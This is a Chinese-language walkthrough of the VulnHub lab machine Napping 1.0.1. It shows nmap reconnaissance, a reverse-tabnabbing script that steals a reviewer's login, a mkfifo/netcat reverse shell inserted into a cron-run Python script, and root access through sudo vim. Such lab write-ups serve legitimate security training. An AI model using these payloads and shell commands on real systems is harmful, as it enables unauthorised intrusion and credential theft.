NAPPING: 1.0.1靶场(Vulnhub系列)
环境说明:
靶机下载地址:
Napping: 1.0.1 ~ VulnHub
本次打靶实验是在VirtualBox虚拟机里进行,kali设置为桥接模式(IP地址为:192.168.212.222)
靶机也是桥接模式(IP地址为:192.168.212.179 经过扫描后确定的)
一.信息收集:
1.1主机探测:
nmap -Pn 192.168.212.0/24
1.2端口扫描:
找到了IP地址,进行端口扫描
nmap -Pn -A -sV -p1-65535 192.168.212.179
发现是个Ubuntu系统,开了80和22端口,老样子先访问Web服务
二.漏洞探测:
发现是个登录框,进行了简单的漏洞探测,发现没什么可以利用的点,变进行了目录扫描,但是也没有发现可以利用的点。现在只能尝试注册一下了,账号和密码随便填了一个root/root123,进行登录
登录进去后:
发现了一句话说:
你好,root!欢迎来到我们的免费博客促销网站。
请提交您的链接,以便我们开始。所有链接都将由我们的管理员审核
因为是靶机,还说了所有链接都将由我们的管理员审核,也就是变相说明是个定时任务,尝试输入一下百度的网址。发现疑似是个tabnabbing漏洞。
三.漏洞利用
3.1标签钓鱼漏洞(tabnabbing)
该攻击手法是由Mozilla Firefox浏览器的界面及创意负责人Aza Raskin发现和命名的,tabnabbing可改变用户浏览网页的标签及接口,以诱导用户输入网络服务的账号与密码。 因此,Raskin将此手法称为标签绑架(tabnapping),他指出当使用者连上一个嵌有第三方script程序或Flash工具的网页时,就会让自己曝露于风险中,因为相关的恶意软件得以侦测使用者经常使用或正在使用的网络服务,在用户暂时离开该网页后,该网页内容及网页标签会悄悄地变身成为伪造的网络服务,并诱导用户输入个人信息。
特征:通过改变打开攻击者控制的站点的页面的URL来滥用 target=_blank,这样做的目的是当你关闭攻击者控制的页面时,骗你登录钓鱼网站。
target="_blank" 是 HTML 中 <a>(超链接)、<form> 等标签里的一个属性设置,它的作用是规定链接或者表单提交之后的页面打开方式。
步骤:
1.在kali里面构造恶意的html界面
vim payload.html
<script>window.opener.location = "http://192.168.212.222:4444";</script>
2.使用python创建一个http服务:
python -m http.server
3.监听4444端口:
nc -lvp 4444
4.在输入框中输入kali开启的http服务对应的恶意html界面
http://192.168.212.222:8000/payload.html
5.在监听窗口等待,发现账号和密码
url解密一下:
username=daniel&password=C@ughtm3napping123
四.权限提升
前面的信息收集发现22端口也是开放的,使用ssh进行登录
先试一下sudo提权,但是该用户没有权限
在查找一下suid,看看有没有能利用的命令,发现并没有什么能够利用的命令
find / -user root -perm -4000 -print 2>/dev/null
在/home/adrian目录下发现个query.py文件
代码会尝试向 http://127.0.0.1/ 发送一个 HTTP GET 请求,根据响应的状态码判断服务器是否正常运行。如果状态码为 200,说明服务器正常,会在日志文件中记录 "Site is Up" 以及当前时间;如果状态码不是 200,则在日志文件中记录 "Check Out Site" 以及当前时间。
在site_status.txt文件中发现了如下图所示的日志,非常规律,显然是做了定时任务,我们可以尝试利用。
在query.py文件中加入反弹shell,并开启监听
import os
os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.212.222 6666 >/tmp/f")
等上两分钟,连接成功
sudo -l一下发现vim被赋予了sudo权限且不需要密码,可以进行提权
sudo vim -c ':!/bin/bash'
提权成功
稳定一下shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
curl + z //键盘上的按键
stty raw -echo;fg
reset
完成!
